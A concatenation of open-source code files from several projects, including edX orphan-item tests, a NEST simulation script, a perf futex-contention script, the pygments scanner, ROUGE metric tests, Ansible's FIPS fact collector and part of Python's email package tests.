from student.models import CourseEnrollment
from xmodule.modulestore.django import modulestore
from contentstore.utils import reverse_course_url
class TestOrphan(CourseTestCase):
"""
Test finding orphans via view and django config
"""
def setUp(self):
super(TestOrphan, self).setUp()
runtime = self.course.runtime
self._create_item('chapter', 'Chapter1', {}, {'display_name': 'Chapter 1'}, 'course', self.course.location.name, runtime)
self._create_item('chapter', 'Chapter2', {}, {'display_name': 'Chapter 2'}, 'course', self.course.location.name, runtime)
self._create_item('chapter', 'OrphanChapter', {}, {'display_name': 'Orphan Chapter'}, None, None, runtime)
self._create_item('vertical', 'Vert1', {}, {'display_name': 'Vertical 1'}, 'chapter', 'Chapter1', runtime)
self._create_item('vertical', 'OrphanVert', {}, {'display_name': 'Orphan Vertical'}, None, None, runtime)
self._create_item('html', 'Html1', "<p>Goodbye</p>", {'display_name': 'Parented Html'}, 'vertical', 'Vert1', runtime)
self._create_item('html', 'OrphanHtml', "<p>Hello</p>", {'display_name': 'Orphan html'}, None, None, runtime)
self._create_item('static_tab', 'staticuno', "<p>tab</p>", {'display_name': 'Tab uno'}, None, None, runtime)
self._create_item('about', 'overview', "<p>overview</p>", {}, None, None, runtime)
self._create_item('course_info', 'updates', "<ol><li><h2>Sep 22</h2><p>test</p></li></ol>", {}, None, None, runtime)
self.orphan_url = reverse_course_url('orphan_handler', self.course.id)
def _create_item(self, category, name, data, metadata, parent_category, parent_name, runtime):
location = self.course.location.replace(category=category, name=name)
store = modulestore()
store.create_item(
self.user.id,
location.course_key,
location.block_type,
location.block_id,
definition_data=data,
metadata=metadata,
runtime=runtime
)
if parent_name:
# add child to parent in mongo
parent_location = self.course.location.replace(category=parent_category, name=parent_name)
parent = store.get_item(parent_location)
parent.children.append(location)
store.update_item(parent, self.user.id)
def test_mongo_orphan(self):
"""
Test that old mongo finds the orphans
"""
orphans = json.loads(
self.client.get(
self.orphan_url,
HTTP_ACCEPT='application/json'
).content
)
self.assertEqual(len(orphans), 3, "Wrong # {}".format(orphans))
location = self.course.location.replace(category='chapter', name='OrphanChapter')
self.assertIn(location.to_deprecated_string(), orphans)
location = self.course.location.replace(category='vertical', name='OrphanVert')
self.assertIn(location.to_deprecated_string(), orphans)
location = self.course.location.replace(category='html', name='OrphanHtml')
self.assertIn(location.to_deprecated_string(), orphans)
def test_mongo_orphan_delete(self):
"""
Test that old mongo deletes the orphans
"""
self.client.delete(self.orphan_url)
orphans = json.loads(
self.client.get(self.orphan_url, HTTP_ACCEPT='application/json').content
)
self.assertEqual(len(orphans), 0, "Orphans not deleted {}".format(orphans))
def test_not_permitted(self):
"""
Test that auth restricts get and delete appropriately
"""
test_user_client, test_user = self.create_non_staff_authed_user_client()
CourseEnrollment.enroll(test_user, self.course.id)
response = test_user_client.get(self.orphan_url)
self.assertEqual(response.status_code, 403)
response = test_user_client.delete(self.orphan_url)
self.assertEqual(response.status_code, 403)
|
agpl-3.0
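Modulestore specifics aside, orphan detection reduces to a reference check: a block is an orphan when no parent lists it as a child. A toy sketch of that core idea with made-up block ids:

def find_orphans(items, children_of):
    """items: iterable of block ids; children_of: dict parent -> list of children."""
    referenced = {child for kids in children_of.values() for child in kids}
    # a block is orphaned if nothing references it and it is not itself a parent/root
    return [i for i in items if i not in referenced and i not in children_of]

children_of = {'course': ['Chapter1'], 'Chapter1': ['Vert1']}
items = ['course', 'Chapter1', 'Vert1', 'OrphanChapter']
print(find_orphans(items, children_of))  # -> ['OrphanChapter']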
|
jakobj/nest-simulator
|
pynest/examples/Potjans_2014/run_microcircuit.py
|
14
|
3878
|
# -*- coding: utf-8 -*-
#
# run_microcircuit.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""PyNEST Microcircuit: Run Simulation
-----------------------------------------
This is an example script for running the microcircuit model and generating
basic plots of the network activity.
"""
###############################################################################
# Import the necessary modules and start the time measurements.
from stimulus_params import stim_dict
from network_params import net_dict
from sim_params import sim_dict
import network
import nest
import numpy as np
import time
time_start = time.time()
###############################################################################
# Initialize the network with simulation, network and stimulation parameters,
# then create and connect all nodes, and finally simulate.
# The times for a presimulation and the main simulation are taken
# independently. A presimulation is useful because the spike activity typically
# exhibits a startup transient. In benchmark simulations, this transient should
# be excluded from a time measurement of the state propagation phase. Besides,
# statistical measures of the spike activity should only be computed after the
# transient has passed.
net = network.Network(sim_dict, net_dict, stim_dict)
time_network = time.time()
net.create()
time_create = time.time()
net.connect()
time_connect = time.time()
net.simulate(sim_dict['t_presim'])
time_presimulate = time.time()
net.simulate(sim_dict['t_sim'])
time_simulate = time.time()
###############################################################################
# Plot a spike raster of the simulated neurons and a box plot of the firing
# rates for each population.
# For visual purposes only, spikes 100 ms before and 100 ms after the thalamic
# stimulus time are plotted here by default.
# The computation of spike rates discards the presimulation time to exclude
# initialization artifacts.
raster_plot_interval = np.array([stim_dict['th_start'] - 100.0,
stim_dict['th_start'] + 100.0])
firing_rates_interval = np.array([sim_dict['t_presim'],
sim_dict['t_presim'] + sim_dict['t_sim']])
net.evaluate(raster_plot_interval, firing_rates_interval)
time_evaluate = time.time()
###############################################################################
# Summarize time measurements. Rank 0 usually takes longest because of the
# data evaluation and print calls.
print(
'\nTimes of Rank {}:\n'.format(
nest.Rank()) +
' Total time: {:.3f} s\n'.format(
time_evaluate -
time_start) +
' Time to initialize: {:.3f} s\n'.format(
time_network -
time_start) +
' Time to create: {:.3f} s\n'.format(
time_create -
time_network) +
' Time to connect: {:.3f} s\n'.format(
time_connect -
time_create) +
' Time to presimulate: {:.3f} s\n'.format(
time_presimulate -
time_connect) +
' Time to simulate: {:.3f} s\n'.format(
time_simulate -
time_presimulate) +
' Time to evaluate: {:.3f} s\n'.format(
time_evaluate -
time_simulate))
|
gpl-2.0
|
RenderBroken/msm8974_Victara-Stock_render_kernel
|
tools/perf/scripts/python/futex-contention.py
|
11261
|
1486
|
# futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
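# ---------------------------------------------------------------------------
# Editor's usage sketch (an assumption, not part of the original script):
# perf python scripts like this one are normally fed a perf.data file that
# was recorded with the matching tracepoints enabled, along these lines:
#
#   perf record -e syscalls:sys_enter_futex -e syscalls:sys_exit_futex -a -- sleep 10
#   perf script -s futex-contention.py
#
# The tracepoint names above are the standard syscalls events; whether they
# are available depends on the kernel configuration.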
|
gpl-2.0
|
ipcamit/ipcamit.github.io
|
node_modules/pygmentize-bundled/vendor/pygments/pygments/scanner.py
|
365
|
3114
|
# -*- coding: utf-8 -*-
"""
pygments.scanner
~~~~~~~~~~~~~~~~
This library implements a regex based scanner. Some languages
like Pascal are easy to parse but have some keywords that
    depend on the context. Because of this it's impossible to lex
    them just by using a regular expression lexer like the
`RegexLexer`.
Have a look at the `DelphiLexer` to get an idea of how to use
this scanner.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
class EndOfText(RuntimeError):
"""
Raise if end of text is reached and the user
tried to call a match function.
"""
class Scanner(object):
"""
Simple scanner
All method patterns are regular expression strings (not
compiled expressions!)
"""
def __init__(self, text, flags=0):
"""
:param text: The text which should be scanned
:param flags: default regular expression flags
"""
self.data = text
self.data_length = len(text)
self.start_pos = 0
self.pos = 0
self.flags = flags
self.last = None
self.match = None
self._re_cache = {}
def eos(self):
"""`True` if the scanner reached the end of text."""
return self.pos >= self.data_length
    eos = property(eos, doc=eos.__doc__)
def check(self, pattern):
"""
Apply `pattern` on the current position and return
the match object. (Doesn't touch pos). Use this for
lookahead.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
return self._re_cache[pattern].match(self.data, self.pos)
def test(self, pattern):
"""Apply a pattern on the current position and check
        if it matches. Doesn't touch pos."""
return self.check(pattern) is not None
def scan(self, pattern):
"""
Scan the text for the given pattern and update pos/match
        and related fields. The return value is a boolean that
indicates if the pattern matched. The matched value is
stored on the instance as ``match``, the last value is
stored as ``last``. ``start_pos`` is the position of the
pointer before the pattern was matched, ``pos`` is the
end position.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
self.last = self.match
m = self._re_cache[pattern].match(self.data, self.pos)
if m is None:
return False
self.start_pos = m.start()
self.pos = m.end()
self.match = m.group()
return True
def get_char(self):
"""Scan exactly one char."""
self.scan('.')
def __repr__(self):
return '<%s %d/%d>' % (
self.__class__.__name__,
self.pos,
self.data_length
)
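# Editor's usage sketch (hypothetical, not part of pygments): tokenizing a
# tiny "name = number" assignment shows how `scan`, `eos` and `match`
# cooperate; every pattern is passed as a plain regex string.
if __name__ == '__main__':
    s = Scanner('answer = 42')
    while not s.eos:
        if s.scan(r'\s+'):
            continue                       # skip whitespace between tokens
        elif s.scan(r'[A-Za-z_]\w*'):
            print 'NAME   %s' % s.match    # -> 'answer'
        elif s.scan(r'\d+'):
            print 'NUMBER %s' % s.match    # -> '42'
        elif s.scan(r'='):
            print 'EQUALS %s' % s.match
        else:
            s.get_char()                   # consume one char and keep going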
|
mit
|
tensorflow/tensor2tensor
|
tensor2tensor/utils/rouge_test.py
|
1
|
4407
|
# coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Rouge metric."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.utils import rouge
import tensorflow.compat.v1 as tf
class TestRouge2Metric(tf.test.TestCase):
"""Tests the rouge-2 metric."""
def testRouge2Identical(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
self.assertAllClose(rouge.rouge_n(hypotheses, references), 1.0, atol=1e-03)
def testRouge2Disjoint(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[8, 9, 10, 11, 12, 13, 14, 15, 16, 17],
[9, 10, 11, 12, 13, 14, 15, 16, 17, 0]])
self.assertEqual(rouge.rouge_n(hypotheses, references), 0.0)
def testRouge2PartialOverlap(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 9, 2, 3, 4, 5, 1, 10, 6, 7],
[1, 9, 2, 3, 4, 5, 1, 10, 6, 7]])
self.assertAllClose(rouge.rouge_n(hypotheses, references), 0.53, atol=1e-03)
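# Editor's note on the 0.53 expectation above (a derivation, assuming
# rouge_n returns the batch mean of per-pair bigram F1 scores and counts
# the trailing 0 padding as an ordinary token):
#   pair 1: 5 of the hypothesis' 8 bigrams occur among the reference's 9,
#           so P=5/8, R=5/9 and F1 = 2PR/(P+R) = 50/85 ~ 0.588;
#   pair 2: 4 shared bigrams give P=4/8, R=4/9 and F1 ~ 0.471;
#   mean((0.588, 0.471)) ~ 0.53, matching the atol=1e-03 assertion.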
class TestRougeLMetric(tf.test.TestCase):
"""Tests the rouge-l metric."""
def testRougeLIdentical(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
self.assertAllClose(
rouge.rouge_l_sentence_level(hypotheses, references), 1.0, atol=1e-03)
def testRougeLDisjoint(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[8, 9, 10, 11, 12, 13, 14, 15, 16, 17],
[9, 10, 11, 12, 13, 14, 15, 16, 17, 0]])
self.assertEqual(rouge.rouge_l_sentence_level(hypotheses, references), 0.0)
def testRougeLPartialOverlap(self):
hypotheses = np.array([[1, 2, 3, 4, 5, 1, 6, 7, 0],
[1, 2, 3, 4, 5, 1, 6, 8, 7]])
references = np.array([[1, 9, 2, 3, 4, 5, 1, 10, 6, 7],
[1, 9, 2, 3, 4, 5, 1, 10, 6, 7]])
self.assertAllClose(
rouge.rouge_l_sentence_level(hypotheses, references), 0.837, atol=1e-03)
class TestRougeMetricsE2E(tf.test.TestCase):
"""Tests the rouge metrics end-to-end."""
def testRouge2MetricE2E(self):
vocab_size = 4
batch_size = 12
seq_length = 12
predictions = tf.one_hot(
np.random.randint(vocab_size, size=(batch_size, seq_length, 1, 1)),
depth=4,
dtype=tf.float32)
targets = np.random.randint(4, size=(12, 12, 1, 1))
with self.test_session() as session:
scores, _ = rouge.rouge_2_fscore(predictions,
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
session.run(a)
def testRougeLMetricE2E(self):
vocab_size = 4
batch_size = 12
seq_length = 12
predictions = tf.one_hot(
np.random.randint(vocab_size, size=(batch_size, seq_length, 1, 1)),
depth=4,
dtype=tf.float32)
targets = np.random.randint(4, size=(12, 12, 1, 1))
with self.test_session() as session:
scores, _ = rouge.rouge_l_fscore(
predictions,
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
session.run(a)
if __name__ == "__main__":
tf.test.main()
|
apache-2.0
|
kvar/ansible
|
lib/ansible/module_utils/facts/system/fips.py
|
232
|
1338
|
# Determine if a system is in 'fips' mode
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.utils import get_file_content
from ansible.module_utils.facts.collector import BaseFactCollector
class FipsFactCollector(BaseFactCollector):
name = 'fips'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
# NOTE: this is populated even if it is not set
fips_facts = {}
fips_facts['fips'] = False
data = get_file_content('/proc/sys/crypto/fips_enabled')
if data and data == '1':
fips_facts['fips'] = True
return fips_facts
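# Editor's sketch (hypothetical helper, not part of Ansible): stripped of
# the collector machinery, the check above reduces to reading the kernel's
# fips switch and comparing it to '1'.
def _fips_enabled_sketch():
    data = get_file_content('/proc/sys/crypto/fips_enabled')
    return data == '1'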
|
gpl-3.0
|
pwoodworth/intellij-community
|
python/lib/Lib/email/test/test_email_renamed.py
|
134
|
118811
|
# Copyright (C) 2001-2007 Python Software Foundation
# Contact: email-sig@python.org
# email package unit tests
import os
import sys
import time
import base64
import difflib
import unittest
import warnings
from cStringIO import StringIO
import email
from email.charset import Charset
from email.header import Header, decode_header, make_header
from email.parser import Parser, HeaderParser
from email.generator import Generator, DecodedGenerator
from email.message import Message
from email.mime.application import MIMEApplication
from email.mime.audio import MIMEAudio
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
from email.mime.message import MIMEMessage
from email.mime.multipart import MIMEMultipart
from email import utils
from email import errors
from email import encoders
from email import iterators
from email import base64mime
from email import quoprimime
from test.test_support import findfile, run_unittest
from email.test import __file__ as landmark
NL = '\n'
EMPTYSTRING = ''
SPACE = ' '
def openfile(filename, mode='r'):
path = os.path.join(os.path.dirname(landmark), 'data', filename)
return open(path, mode)
# Base test class
class TestEmailBase(unittest.TestCase):
def ndiffAssertEqual(self, first, second):
"""Like failUnlessEqual except use ndiff for readable output."""
if first <> second:
sfirst = str(first)
ssecond = str(second)
diff = difflib.ndiff(sfirst.splitlines(), ssecond.splitlines())
fp = StringIO()
print >> fp, NL, NL.join(diff)
raise self.failureException, fp.getvalue()
def _msgobj(self, filename):
fp = openfile(findfile(filename))
try:
msg = email.message_from_file(fp)
finally:
fp.close()
return msg
# Test various aspects of the Message class's API
class TestMessageAPI(TestEmailBase):
def test_get_all(self):
eq = self.assertEqual
msg = self._msgobj('msg_20.txt')
eq(msg.get_all('cc'), ['ccc@zzz.org', 'ddd@zzz.org', 'eee@zzz.org'])
eq(msg.get_all('xx', 'n/a'), 'n/a')
def test_getset_charset(self):
eq = self.assertEqual
msg = Message()
eq(msg.get_charset(), None)
charset = Charset('iso-8859-1')
msg.set_charset(charset)
eq(msg['mime-version'], '1.0')
eq(msg.get_content_type(), 'text/plain')
eq(msg['content-type'], 'text/plain; charset="iso-8859-1"')
eq(msg.get_param('charset'), 'iso-8859-1')
eq(msg['content-transfer-encoding'], 'quoted-printable')
eq(msg.get_charset().input_charset, 'iso-8859-1')
# Remove the charset
msg.set_charset(None)
eq(msg.get_charset(), None)
eq(msg['content-type'], 'text/plain')
# Try adding a charset when there's already MIME headers present
msg = Message()
msg['MIME-Version'] = '2.0'
msg['Content-Type'] = 'text/x-weird'
msg['Content-Transfer-Encoding'] = 'quinted-puntable'
msg.set_charset(charset)
eq(msg['mime-version'], '2.0')
eq(msg['content-type'], 'text/x-weird; charset="iso-8859-1"')
eq(msg['content-transfer-encoding'], 'quinted-puntable')
def test_set_charset_from_string(self):
eq = self.assertEqual
msg = Message()
msg.set_charset('us-ascii')
eq(msg.get_charset().input_charset, 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
def test_set_payload_with_charset(self):
msg = Message()
charset = Charset('iso-8859-1')
msg.set_payload('This is a string payload', charset)
self.assertEqual(msg.get_charset().input_charset, 'iso-8859-1')
def test_get_charsets(self):
eq = self.assertEqual
msg = self._msgobj('msg_08.txt')
charsets = msg.get_charsets()
eq(charsets, [None, 'us-ascii', 'iso-8859-1', 'iso-8859-2', 'koi8-r'])
msg = self._msgobj('msg_09.txt')
charsets = msg.get_charsets('dingbat')
eq(charsets, ['dingbat', 'us-ascii', 'iso-8859-1', 'dingbat',
'koi8-r'])
msg = self._msgobj('msg_12.txt')
charsets = msg.get_charsets()
eq(charsets, [None, 'us-ascii', 'iso-8859-1', None, 'iso-8859-2',
'iso-8859-3', 'us-ascii', 'koi8-r'])
def test_get_filename(self):
eq = self.assertEqual
msg = self._msgobj('msg_04.txt')
filenames = [p.get_filename() for p in msg.get_payload()]
eq(filenames, ['msg.txt', 'msg.txt'])
msg = self._msgobj('msg_07.txt')
subpart = msg.get_payload(1)
eq(subpart.get_filename(), 'dingusfish.gif')
def test_get_filename_with_name_parameter(self):
eq = self.assertEqual
msg = self._msgobj('msg_44.txt')
filenames = [p.get_filename() for p in msg.get_payload()]
eq(filenames, ['msg.txt', 'msg.txt'])
def test_get_boundary(self):
eq = self.assertEqual
msg = self._msgobj('msg_07.txt')
# No quotes!
eq(msg.get_boundary(), 'BOUNDARY')
def test_set_boundary(self):
eq = self.assertEqual
# This one has no existing boundary parameter, but the Content-Type:
# header appears fifth.
msg = self._msgobj('msg_01.txt')
msg.set_boundary('BOUNDARY')
header, value = msg.items()[4]
eq(header.lower(), 'content-type')
eq(value, 'text/plain; charset="us-ascii"; boundary="BOUNDARY"')
# This one has a Content-Type: header, with a boundary, stuck in the
# middle of its headers. Make sure the order is preserved; it should
# be fifth.
msg = self._msgobj('msg_04.txt')
msg.set_boundary('BOUNDARY')
header, value = msg.items()[4]
eq(header.lower(), 'content-type')
eq(value, 'multipart/mixed; boundary="BOUNDARY"')
# And this one has no Content-Type: header at all.
msg = self._msgobj('msg_03.txt')
self.assertRaises(errors.HeaderParseError,
msg.set_boundary, 'BOUNDARY')
def test_get_decoded_payload(self):
eq = self.assertEqual
msg = self._msgobj('msg_10.txt')
# The outer message is a multipart
eq(msg.get_payload(decode=True), None)
# Subpart 1 is 7bit encoded
eq(msg.get_payload(0).get_payload(decode=True),
'This is a 7bit encoded message.\n')
# Subpart 2 is quopri
eq(msg.get_payload(1).get_payload(decode=True),
'\xa1This is a Quoted Printable encoded message!\n')
# Subpart 3 is base64
eq(msg.get_payload(2).get_payload(decode=True),
'This is a Base64 encoded message.')
# Subpart 4 has no Content-Transfer-Encoding: header.
eq(msg.get_payload(3).get_payload(decode=True),
'This has no Content-Transfer-Encoding: header.\n')
def test_get_decoded_uu_payload(self):
eq = self.assertEqual
msg = Message()
msg.set_payload('begin 666 -\n+:&5L;&\\@=V]R;&0 \n \nend\n')
for cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
msg['content-transfer-encoding'] = cte
eq(msg.get_payload(decode=True), 'hello world')
# Now try some bogus data
msg.set_payload('foo')
eq(msg.get_payload(decode=True), 'foo')
def test_decoded_generator(self):
eq = self.assertEqual
msg = self._msgobj('msg_07.txt')
fp = openfile('msg_17.txt')
try:
text = fp.read()
finally:
fp.close()
s = StringIO()
g = DecodedGenerator(s)
g.flatten(msg)
eq(s.getvalue(), text)
def test__contains__(self):
msg = Message()
msg['From'] = 'Me'
msg['to'] = 'You'
# Check for case insensitivity
self.failUnless('from' in msg)
self.failUnless('From' in msg)
self.failUnless('FROM' in msg)
self.failUnless('to' in msg)
self.failUnless('To' in msg)
self.failUnless('TO' in msg)
def test_as_string(self):
eq = self.assertEqual
msg = self._msgobj('msg_01.txt')
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
eq(text, msg.as_string())
fullrepr = str(msg)
lines = fullrepr.split('\n')
self.failUnless(lines[0].startswith('From '))
eq(text, NL.join(lines[1:]))
def test_bad_param(self):
msg = email.message_from_string("Content-Type: blarg; baz; boo\n")
self.assertEqual(msg.get_param('baz'), '')
def test_missing_filename(self):
msg = email.message_from_string("From: foo\n")
self.assertEqual(msg.get_filename(), None)
def test_bogus_filename(self):
msg = email.message_from_string(
"Content-Disposition: blarg; filename\n")
self.assertEqual(msg.get_filename(), '')
def test_missing_boundary(self):
msg = email.message_from_string("From: foo\n")
self.assertEqual(msg.get_boundary(), None)
def test_get_params(self):
eq = self.assertEqual
msg = email.message_from_string(
'X-Header: foo=one; bar=two; baz=three\n')
eq(msg.get_params(header='x-header'),
[('foo', 'one'), ('bar', 'two'), ('baz', 'three')])
msg = email.message_from_string(
'X-Header: foo; bar=one; baz=two\n')
eq(msg.get_params(header='x-header'),
[('foo', ''), ('bar', 'one'), ('baz', 'two')])
eq(msg.get_params(), None)
msg = email.message_from_string(
'X-Header: foo; bar="one"; baz=two\n')
eq(msg.get_params(header='x-header'),
[('foo', ''), ('bar', 'one'), ('baz', 'two')])
def test_get_param_liberal(self):
msg = Message()
msg['Content-Type'] = 'Content-Type: Multipart/mixed; boundary = "CPIMSSMTPC06p5f3tG"'
self.assertEqual(msg.get_param('boundary'), 'CPIMSSMTPC06p5f3tG')
def test_get_param(self):
eq = self.assertEqual
msg = email.message_from_string(
"X-Header: foo=one; bar=two; baz=three\n")
eq(msg.get_param('bar', header='x-header'), 'two')
eq(msg.get_param('quuz', header='x-header'), None)
eq(msg.get_param('quuz'), None)
msg = email.message_from_string(
'X-Header: foo; bar="one"; baz=two\n')
eq(msg.get_param('foo', header='x-header'), '')
eq(msg.get_param('bar', header='x-header'), 'one')
eq(msg.get_param('baz', header='x-header'), 'two')
# XXX: We are not RFC-2045 compliant! We cannot parse:
# msg["Content-Type"] = 'text/plain; weird="hey; dolly? [you] @ <\\"home\\">?"'
# msg.get_param("weird")
# yet.
def test_get_param_funky_continuation_lines(self):
msg = self._msgobj('msg_22.txt')
self.assertEqual(msg.get_payload(1).get_param('name'), 'wibble.JPG')
def test_get_param_with_semis_in_quotes(self):
msg = email.message_from_string(
'Content-Type: image/pjpeg; name="Jim&&Jill"\n')
self.assertEqual(msg.get_param('name'), 'Jim&&Jill')
self.assertEqual(msg.get_param('name', unquote=False),
'"Jim&&Jill"')
def test_has_key(self):
msg = email.message_from_string('Header: exists')
self.failUnless(msg.has_key('header'))
self.failUnless(msg.has_key('Header'))
self.failUnless(msg.has_key('HEADER'))
self.failIf(msg.has_key('headeri'))
def test_set_param(self):
eq = self.assertEqual
msg = Message()
msg.set_param('charset', 'iso-2022-jp')
eq(msg.get_param('charset'), 'iso-2022-jp')
msg.set_param('importance', 'high value')
eq(msg.get_param('importance'), 'high value')
eq(msg.get_param('importance', unquote=False), '"high value"')
eq(msg.get_params(), [('text/plain', ''),
('charset', 'iso-2022-jp'),
('importance', 'high value')])
eq(msg.get_params(unquote=False), [('text/plain', ''),
('charset', '"iso-2022-jp"'),
('importance', '"high value"')])
msg.set_param('charset', 'iso-9999-xx', header='X-Jimmy')
eq(msg.get_param('charset', header='X-Jimmy'), 'iso-9999-xx')
def test_del_param(self):
eq = self.assertEqual
msg = self._msgobj('msg_05.txt')
eq(msg.get_params(),
[('multipart/report', ''), ('report-type', 'delivery-status'),
('boundary', 'D1690A7AC1.996856090/mail.example.com')])
old_val = msg.get_param("report-type")
msg.del_param("report-type")
eq(msg.get_params(),
[('multipart/report', ''),
('boundary', 'D1690A7AC1.996856090/mail.example.com')])
msg.set_param("report-type", old_val)
eq(msg.get_params(),
[('multipart/report', ''),
('boundary', 'D1690A7AC1.996856090/mail.example.com'),
('report-type', old_val)])
def test_del_param_on_other_header(self):
msg = Message()
msg.add_header('Content-Disposition', 'attachment', filename='bud.gif')
msg.del_param('filename', 'content-disposition')
self.assertEqual(msg['content-disposition'], 'attachment')
def test_set_type(self):
eq = self.assertEqual
msg = Message()
self.assertRaises(ValueError, msg.set_type, 'text')
msg.set_type('text/plain')
eq(msg['content-type'], 'text/plain')
msg.set_param('charset', 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
msg.set_type('text/html')
eq(msg['content-type'], 'text/html; charset="us-ascii"')
def test_set_type_on_other_header(self):
msg = Message()
msg['X-Content-Type'] = 'text/plain'
msg.set_type('application/octet-stream', 'X-Content-Type')
self.assertEqual(msg['x-content-type'], 'application/octet-stream')
def test_get_content_type_missing(self):
msg = Message()
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_type_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_type(), 'message/rfc822')
def test_get_content_type_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_type(),
'message/rfc822')
def test_get_content_type_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_type(),
'message/rfc822')
def test_get_content_type_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_type_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_maintype_missing(self):
msg = Message()
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_maintype_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_maintype(), 'message')
def test_get_content_maintype_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_maintype(), 'message')
def test_get_content_maintype_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_maintype(), 'message')
def test_get_content_maintype_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_maintype_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_subtype_missing(self):
msg = Message()
self.assertEqual(msg.get_content_subtype(), 'plain')
